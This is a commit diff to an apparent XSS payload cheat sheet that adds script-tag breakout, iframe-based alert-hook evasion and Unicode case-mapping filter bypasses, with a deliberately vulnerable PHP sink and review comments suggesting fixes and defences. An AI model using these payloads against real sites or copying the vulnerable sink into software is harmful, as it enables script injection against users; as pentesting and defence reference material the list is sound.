XSS Unicode update
parent
b01c249da8
commit
c9e13fcc36
@ -368,6 +368,16 @@ Bypass quotes for string
|
|||||||
String.fromCharCode(88,83,83)
|
String.fromCharCode(88,83,83)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass quotes in script tag
|
||||||
|
```
|
||||||
|
http://localhost/bla.php?test=</script><script>alert(1)</script>
|
||||||
|
<html>
|
||||||
|
<script>
|
||||||
|
<?php echo 'foo="text '.$_GET['test'].'";';`?>
|
||||||
|
</script>
|
||||||
|
</html>
|
||||||
|
```
|
||||||
|
|
||||||
Bypass dot filter
|
Bypass dot filter
|
||||||
```
|
```
|
||||||
<script>window['alert'](document['domain'])<script>
|
<script>window['alert'](document['domain'])<script>
|
||||||
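Review bot: The added PHP line in the "Bypass quotes in script tag" example has a stray backtick between `';` and `?>`, so the sample is not valid PHP; it should read `<?php echo 'foo="text '.$_GET['test'].'";'; ?>`. The section also does not say why the request works: the HTML parser closes the script element at the first `</script>` before the JavaScript string literal is ever parsed, so escaping quotes alone does not protect this sink. I would add that sentence together with the mitigation, e.g. `Fix: emit the value with json_encode($_GET['test'], JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) instead of concatenating it into the script block.`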
@ -421,6 +431,28 @@ Bypass using an alternate way to execute an alert
|
|||||||
<script>top['alert'](3)</script>
|
<script>top['alert'](3)</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using an alternate way to trigger an alert
|
||||||
|
```
|
||||||
|
var i = document.createElement("iframe");
|
||||||
|
i.onload = function(){
|
||||||
|
i.contentWindow.alert(1);
|
||||||
|
}
|
||||||
|
document.appendChild(i);
|
||||||
|
|
||||||
|
// Bypassed security
|
||||||
|
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
|
||||||
|
var proxy = obj[name];
|
||||||
|
obj[name] = function () {
|
||||||
|
if (exec_original) {
|
||||||
|
return proxy.apply(this, arguments);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
XSSObject.lockdown(obj, name);
|
||||||
|
};
|
||||||
|
XSSObject.proxy(window, 'alert', 'window.alert', false);
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
Bypass ';' using another character
|
Bypass ';' using another character
|
||||||
```
|
```
|
||||||
'te' * alert('*') * 'xt';
|
'te' * alert('*') * 'xt';
|
||||||
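Review bot: The new fence under "Bypass using an alternate way to trigger an alert" puts two different things in one block without saying which is which: the iframe snippet at the top, and the `XSSObject.proxy` code under `// Bypassed security`, which reads as the page-side hook on `window.alert` that is being sidestepped rather than part of the technique. I would split the fence or reword the comment, e.g. `// The in-page protection this defeats: alert is hooked on the top window only`. One sentence for defenders would also help: a hook installed on one window object does not extend to the `contentWindow` of a newly created frame, so overriding built-ins is not a security boundary, and output encoding plus a Content-Security-Policy is what actually constrains script here. The new heading is also nearly identical to the existing "alternate way to execute an alert" heading shown in the hunk header, which makes the two sections hard to tell apart.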
@ -465,6 +497,17 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
|
|||||||
%EF%BC%9C becomes <
|
%EF%BC%9C becomes <
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using unicode converted to uppercase
|
||||||
|
```
|
||||||
|
İ (%c4%b0).toLowerCase() => i
|
||||||
|
ı (%c4%b1).toUpperCase() => I
|
||||||
|
ſ (%c5%bf) .toUpperCase() => S
|
||||||
|
K (%E2%84%AA).toLowerCase() => k
|
||||||
|
|
||||||
|
<ſvg onload=... > become <SVG ONLOAD=...>
|
||||||
|
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
|
||||||
|
```
|
||||||
|
|
||||||
Bypass using overlong UTF-8
|
Bypass using overlong UTF-8
|
||||||
```
|
```
|
||||||
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
||||||
|
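Review bot: The heading "Bypass using unicode converted to uppercase" does not match the block beneath it, where two of the four mappings (the `%c4%b0` and `%E2%84%AA` rows) are `toLowerCase()` results; `Bypass using Unicode case mapping (toUpperCase / toLowerCase)` would be accurate. The `<ſvg onload=... >` line omits the `.toUpperCase()` call that the `<ıframe ...>` line shows, and both lines should read "becomes". A closing sentence on the defensive consequence would help: `Filters must run after any case conversion or normalization, on the exact string that is written to the page.`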